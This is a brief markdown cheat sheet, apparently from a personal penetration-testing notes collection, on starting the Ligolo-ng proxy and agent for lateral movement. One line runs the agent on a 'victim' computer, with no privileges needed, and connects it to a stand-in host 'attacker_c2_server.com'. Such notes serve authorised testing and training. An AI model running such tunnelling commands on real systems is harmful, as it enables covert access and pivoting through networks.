H3llKa1ser/B00t2R00t/Lateral Movement/Ligolo-ng.md

 - ./proxy -autocert (Automatically request LetsEncrypt certificates)

+- ./proxy -selfcert (DON'T USE THIS ON A REAL ENGAGEMENT)

 # Usage

  -  ./agent -connect attacker_c2_server.com:11601 (Start the agent on your target (victim) computer (no privileges are required!)